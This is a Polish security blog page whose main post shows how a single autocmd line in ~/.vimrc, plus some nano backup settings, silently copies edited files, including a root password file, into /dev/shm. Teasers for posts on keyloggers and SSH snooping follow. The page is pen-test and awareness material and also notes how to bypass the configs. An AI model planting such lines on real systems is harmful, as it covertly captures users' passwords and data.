NFsec Logo

Zamieniamy vim w keylogger

06/03/2023 w Pen Test Możliwość komentowania Zamieniamy vim w keylogger została wyłączona

Jeśli dodamy poniższą linijkę do pliku ~/.vimrc lub ~/.vim/plugins/keylogger.vim:

:autocmd BufWritePost * :silent :w! >> /dev/shm/keylogger.txt

To wszystkie wpisane dane wpisane w edytorze wylądują w pliku /dev/shm/keylogger.txt. Dla osób stojących po drugiej stronie wojny edytorów – jeśli do pliku ~/.nanorc lub /etc/nanorc wpisy:

set backup
set backupdir /dev/shm
set allow_insecure_backup

To kopie zapasowe edytowanych plików wylądują w katalogu /dev/shm/:

root@stardust:~# ls -al /dev/shm/
total 8
drwxrwxrwt  2 root root   80 Mar  6 20:17  .
drwxr-xr-x 18 root root 4120 Feb 11 17:58  ..
-rw-r-----  1 root root   31 Mar  6 20:09  keylogger.txt
-rw-r-----  1 root root   22 Mar  6 20:09 '!root!passwords.txt~'

Jeśli pliki konfiguracyjne mają zostać pominięte przy uruchomieniu wystarczy uruchomić je z opcjami:

nano -R [plik]
vim -u NONE [plik]

Więcej informacji: Alh4zr3d on Twitter

Inwigilacja połączeń SSH za pomocą strace

12/11/2016 w Bezpieczeństwo 1 komentarz.

T

o, że używamy SSH do połączeń z serwerami nie oznacza, że możemy czuć się bezpiecznie. Szczególnie musimy uważać na te maszyny, którymi zarządzają niezaufane osoby. Dlaczego? Ponieważ odczyt niezaszyfrowanych danych w systemie można wykonać na różnych poziomach dostępu. Za przykład weźmy wywołanie ptrace, które jest używane do monitoringu i kontroli innych procesów. Głównie jest używane do debugowania, a chyba najpopularniejszym programem wykorzystującym jego możliwości jest strace.
[ czytaj całość… ]

Keysniffer (keylogger) jako moduł do jądra Linuksa

22/05/2016 w Bezpieczeństwo Możliwość komentowania Keysniffer (keylogger) jako moduł do jądra Linuksa została wyłączona

A

run Prakash Jana napisał moduł do jądra Linuksa, który przechwytuje naciśnięcia klawiszy na klawiaturze. Współpracuje z klawiaturami o układzie US (i zgodnych z nimi komputerami przenośnymi). Przyciśnięte klawisze są zapisywane w przestrzeni systemu plików pomagającym w debugowaniu innych systemów plików – debugfs tak długo dopóki moduł pozostaje załadowany w systemie.
[ czytaj całość… ]

Hak na Windows

26/03/2010 w Magazyny Możliwość komentowania Hak na Windows została wyłączona

I

mię domowego zwierzaka i bieżący rok to najczęściej wykorzystywany schemat haseł. Jednak, gdy hasło jest tak silne, że nie można go wykryć typowymi metodami, istnieje groźba, że zostanie ono podsłuchane. Nie chodzi o przysłuchiwanie się osobom mamroczącym podczas pisania, lecz o podsłuchiwanie klawiatury przez programy uruchomione w Windows.
[ czytaj całość… ]

Network snooping, czyli szpiegowanie sieci i hostów

18/03/2010 w Ataki Internetowe Możliwość komentowania Network snooping, czyli szpiegowanie sieci i hostów została wyłączona

N

etwork snooping – (ang. szpiegowanie sieci) – ten rodzaj ataku jest przez wielu uważany za najbardziej wyrafinowaną metodę wywiadu do przeprowadzenia dalszego procesu ataków. Do jej przeprowadzenia wykorzystuje się różnego rodzaju analizatory sieci i inne narzędzia, dzięki którym potencjalny włamywacz wybiera taką metodę ataku, która w danym przypadku będzie najbardziej efektywna.
[ czytaj całość… ]